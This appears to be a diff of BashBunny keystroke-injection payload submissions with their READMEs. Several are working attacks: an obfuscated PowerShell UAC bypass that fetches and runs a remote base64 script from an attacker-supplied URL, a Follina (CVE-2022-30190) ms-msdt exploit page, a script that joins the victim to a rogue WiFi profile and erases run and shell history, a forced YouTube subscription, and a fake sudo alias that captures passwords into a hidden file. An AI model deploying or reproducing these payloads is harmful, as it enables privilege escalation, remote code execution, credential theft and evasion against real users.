STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} );exit
ENTER

21
payloads/library/execution/-BB-SafeHaven/payload.txt Normal file
View File

@ -0,0 +1,21 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
LED STAGE1
QUACK ${SWITCH_POSITION}/SafeHaven.txt

104
payloads/library/execution/-BB-UrAttaControl/README.md Normal file
View File

@ -0,0 +1,104 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# UrAttaControl
A script used to open an elevated powershell console and execute admin level commands
## Description
Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
This script will use IEX to download a base64 script to the $Payload variable
Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64
script saved in the $Payload variable
This payload completely bypasses the UAC and will run any admin level script without a prompt
You can use this function I wrote to convert your .ps1 sscripts to Base64
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A keystroke injection based payload will run
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-UrAttaControl)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

30
payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt Normal file
View File

@ -0,0 +1,30 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
REM You can use this function I wrote to convert your .ps1 sscripts to Base64
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
SHIFT ENTER
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
SHIFT ENTER
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER
STRING exit
ENTER

21
payloads/library/execution/-BB-UrAttaControl/payload.txt Normal file
View File

@ -0,0 +1,21 @@
REM Title: UrAttaControl
REM Author: I am Jakoby
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
LED STAGE1
QUACK ${SWITCH_POSITION}/UrAttaControl.txt

31
payloads/library/execution/FollinaBunny/README.md Normal file
View File

@ -0,0 +1,31 @@
# FollinaBunny
- Author: PanicAcid
- Version: 1.0
- Target: Windows (Powershell 5.1+)
- Category: Execution
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: Cribbit and 0xBacco
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Executes code leveraging CVE-2022-30190 aka Follina using a malicious html file hosted on the Bunny itself. Whilst this exploit can be called via a malicious word document, a simple wget via PowerShell will also execute the malicious code.. Tweak and well you get the picture.
This WILL flag on Defender if you're up to date, however the PoC here isn't that you can just run this code, it's that you can self serve this malicious html file via the BashBunny and you can tweak it to your hearts content.
Based on Cribbit's Moo payload https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/prank/Win_PoSH_AnsiSebsCow
Example payload taken from https://greynolds.me.uk/ - https://greynolds.me.uk/poc.html
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |

38
payloads/library/execution/FollinaBunny/payload.html Normal file
View File

@ -0,0 +1,38 @@
<!doctype html>
<html lang="en">
<head>
<title>
Good thing we disabled macros
</title>
</head>
<body>
<p>
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.
Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.
Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellentesque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.
Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas scelerisque, vulputate id est. Proin rutrum nec metus convallis ornare. Ut ultricies ante et dictum imperdiet. Ut nisl magna, porttitor nec odio non, dapibus maximus nibh. Integer lorem felis, accumsan a dapibus hendrerit, maximus nec leo. Vestibulum porta, orci sed dignissim porta, sem justo porta odio, quis rutrum tortor arcu quis massa. Aenean eleifend nisi a quam faucibus, quis scelerisque lectus condimentum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin non dui nec odio finibus molestie. Suspendisse id massa nunc. Sed ultricies et sapien vel fringilla.
</p>
<p>
Donec tincidunt ac justo et iaculis. Pellentesque lacinia, neque at consectetur porttitor, leo eros bibendum lorem, eu sollicitudin dolor urna pharetra augue. Pellentesque facilisis orci quis ante tempor, ac varius eros blandit. Nulla vulputate, purus eu consectetur ullamcorper, mauris nulla commodo dolor, in maximus purus mi eget purus. In mauris diam, imperdiet ac dignissim ut, mollis in purus. In congue volutpat tortor eu auctor. Nullam a eros lectus. Aenean porta semper quam ac lacinia. Curabitur interdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.
Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condimentum est. Nulla eget blandit elit. Nunc facilisis erat nec ligula ultrices, malesuada mollis ex porta. Phasellus iaculis lorem eu augue tincidunt, in ultrices massa suscipit. Donec gravida sapien ac dui interdum cursus. In finibus eu dolor sit amet porta. Sed ultrices nisl dui, at lacinia lectus porttitor ut.
Ut ac viverra risus. Suspendisse lacus nunc, porttitor facilisis mauris ut, ullamcorper gravida dolor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus sollicitudin, arcu id sagittis facilisis, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at semper lectus.
</p>
<p>
Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.
Morbi convallis fringilla tortor, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas aliquet felis vel nulla auctor, ac tempor mi mattis. Nam accumsan nisi vulputate, vestibulum nisl at, gravida erat. Nam diam metus, tempor id sapien eu, porta luctus felis. Aliquam luctus vitae tortor quis consectetur. In rutrum neque sit amet fermentum rutrum. Sed a velit at metus pretium tincidunt tristique eget nibh. In ultricies, est ut varius pulvinar, magna purus tristique arcu, et laoreet purus elit ac lectus. Ut venenatis tempus magna, non varius augue consectetur ut.
Etiam elit risus, ullamcorper cursus nisl at, ultrices aliquet turpis. Maecenas vitae odio non dolor venenatis varius eu ac sem. Phasellus id tortor tellus. Ut vehicula, justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.
</p>
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../../../$(\\windows\\system32\\calc)/.exe\"";
</script>
</body>
</html>

38
payloads/library/execution/FollinaBunny/payload.txt Normal file
View File

@ -0,0 +1,38 @@
#!/bin/bash
# Title: PoC Follina Execution via BashBunny
# Description: Serves up a malicious website that leverages the current CVE-2022-30190 aka Follina
# Author: PanicAcid
# Version: 1.0
# Category: Execution
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: Based on Cribbit's Moo payload https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/prank/Win_PoSH_AnsiSebsCow
# Example payload taken from https://greynolds.me.uk/ - https://greynolds.me.uk/poc.html
# Notes: This WILL flag on Defender if you're up to date, however the PoC here isn't that you can just run this code, it's that you can self serve
# this malicious html file via the BashBunny and you can tweak it to your hearts content.
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN powershell.exe "wget http://$HOST_IP/payload.html"
QUACK DELAY 500
LED FINISH

80
payloads/library/general/-BB-PineApple/PineApple.txt Normal file
View File

@ -0,0 +1,80 @@
REM Title: PineApple
REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
REM This version is a direct key stroke injection attack
REM Author: I am Jakoby
REM Target: Windows 10, 11
DELAY 3000
REM If the wifi pineapple SSID is detected target PC will connect to it
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
STRING $profilefile="Home.xml";
SHIFT ENTER
STRING $SSID="PineApple";
SHIFT ENTER
STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
SHIFT ENTER
DELAY 500
STRING $xmlfile="<?xml version=""1.0""?>
SHIFT ENTER
STRING <WLANProfile xmlns=""http://www.microsoft.com/networking/WLAN/profile/v1"">
SHIFT ENTER
STRING <name>$SSID</name>
SHIFT ENTER
STRING <SSIDConfig>
SHIFT ENTER
STRING <SSID>
SHIFT ENTER
STRING <hex>$SSIDHEX</hex>
SHIFT ENTER
STRING <name>$SSID</name>
SHIFT ENTER
STRING </SSID>
SHIFT ENTER
STRING </SSIDConfig>
SHIFT ENTER
STRING <connectionType>ESS</connectionType>
SHIFT ENTER
STRING <connectionMode>manual</connectionMode>
SHIFT ENTER
STRING <MSM>
SHIFT ENTER
STRING <security>
SHIFT ENTER
STRING <authEncryption>
SHIFT ENTER
STRING <authentication>open</authentication>
SHIFT ENTER
STRING <encryption>none</encryption>
SHIFT ENTER
STRING <useOneX>false</useOneX>
SHIFT ENTER
STRING </authEncryption>
SHIFT ENTER
STRING </security>
SHIFT ENTER
STRING </MSM>
SHIFT ENTER
STRING </WLANProfile>
SHIFT ENTER
STRING "
SHIFT ENTER
STRING $XMLFILE > ($profilefile)
SHIFT ENTER
STRING netsh wlan add profile filename="$($profilefile)"
SHIFT ENTER
STRING netsh wlan connect name=$SSID
SHIFT ENTER
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
DELAY 500
ENTER

95
payloads/library/general/-BB-PineApple/README.md Normal file
View File

@ -0,0 +1,95 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# PineApple
A script used to connect a targets PC to your wifi PineApple
## Description
This program will generate an XML file that will be used to create a network profile for your Wifi PineApple.
The XML file will be manually entered into a powershell window
the powershell window and run box will be erased for a clean exit.
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-PineApple)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

20
payloads/library/general/-BB-PineApple/payload.txt Normal file
View File

@ -0,0 +1,20 @@
# Title: PineApple
# Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
# Author: I am Jakoby
# Version: 1.0
# Category: General
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
LED STAGE1
QUACK ${SWITCH_POSITION}/PineApple.txt

93
payloads/library/general/-BB-Subscribe/README.md Normal file
View File

@ -0,0 +1,93 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Subscribe
A script I put together to make your target subscribe to your youtube channel
## Description
This script is set to use powershell to open your youtube page in their browser where they will be prompted to follow you.
SPOILER: They will.
## Getting Started
### Dependencies
* Windows 10,11
* Your target will have to be signed into their youtube account
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Subscribe)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

38
payloads/library/general/-BB-Subscribe/Subscribe.ps1 Normal file
View File

@ -0,0 +1,38 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program is designed to get your target to subscribe to your youtube channel
#>
#############################################################################################################################################
# Enter your youtube channel URL here, but you should test this script with my URL first ;D
$channel = "https://www.youtube.com/iamjakoby"
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$url = -join($channel,"?sub_confirmation=1")
Start-Process $url
Start-Sleep -Seconds 3
[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
Start-Sleep -Seconds 1
[System.Windows.Forms.SendKeys]::SendWait('%{F4}')

22
payloads/library/general/-BB-Subscribe/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: Subscribe
# Description: This payload is meant to make your target subscribe to your youtube channel
# Author: I am Jakoby
# Version: 1.0
# Category: General
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Subscribe.ps1')"
QUACK ENTER

46
payloads/library/phishing/fake-sudo/README.md Normal file
View File

@ -0,0 +1,46 @@
# Fake sudo
- Title: Fake sudo
- Author: TW-D
- Version: 1.1
- Target: Linux
- Category: Phishing
## Description
1) Copies the "sudo" command spoofing program to the user's home directory.
2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
- __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
- __But__ this behavior can be changed in line 26 of the "sudo-phishing.sh" file.
4) The spoofing program deletes the "sudo" alias. Then it deletes itself.
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
```
From "sudo-phishing.sh" change the values of the following constants if necessary :
```bash
readonly MAXIMUM_ATTEMPTS=3
readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
```
From "sudo-phishing.sh", change the payload if you wish :
```bash
##
# <YOUR-PAYLOAD>
##
/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
##
# </YOUR-PAYLOAD>
##
```

86
payloads/library/phishing/fake-sudo/payload.txt Normal file
View File

@ -0,0 +1,86 @@
#!/bin/bash
#
# Title: Fake-sudo
#
# Description:
# This program creates a fake "sudo"
# command by defining an persistent alias.
#
# Author: TW-D
# Version: 1.1
# Category: Phishing
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Ubuntu 20.04.4 LTS x86_64 (Xfce)
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
Q CTRL-ALT t
Q DELAY 7000
LED STAGE2
Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
Q ENTER
Q DELAY 1500
Q STRING " cp ./sudo-phishing.sh ~/.sudo_phishing.sh"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING " chmod +x ~/.sudo_phishing.sh"
Q ENTER
Q DELAY 1500
Q STRING " printf \"\\nalias sudo='~/.sudo_phishing.sh'\\n\" >> ~/.bash_aliases"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING " exit"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

46
payloads/library/phishing/fake-sudo/sudo-phishing.sh Normal file
View File

@ -0,0 +1,46 @@
#!/bin/bash
#
# Fake-sudo
#
# This program imitates the behavior
# of the "sudo" command.
#
if [ -z "${SUDO_PROMPT}" ]; then
readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
else
readonly INPUT_MESSAGE="${SUDO_PROMPT}"
fi
readonly MAXIMUM_ATTEMPTS=3
readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
attempts() {
/bin/echo -n "${INPUT_MESSAGE}"
read -r -s sudo_password
/bin/echo ""
if ( /bin/echo "${sudo_password}" | /usr/bin/sudo -S /bin/true > /dev/null 2>&1 ); then
##
# <YOUR-PAYLOAD>
##
/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
##
# </YOUR-PAYLOAD>
##
/bin/rm ~/.sudo_phishing.sh
/usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak
/bin/mv ~/.bash_aliases_bak ~/.bash_aliases
/bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
$BASH
exit 0
fi
}
if ( (/usr/bin/sudo -n /bin/true > /dev/null 2>&1) || [ "${#}" -eq 0 ] ); then
/usr/bin/sudo "${@}"
else
for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
attempts "${@}"
done
/bin/echo "${ERROR_MESSAGE}"
fi

704
payloads/library/prank/-BB-AcidBurn/AcidBurn.ps1 Normal file
View File

@ -0,0 +1,704 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : AcidBurn | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby (youtube link with demonstration coming soon) # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script was not optimized to shorten the code. This script is intended to have as much readablility as possible for new coders to learn.
.DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
#>
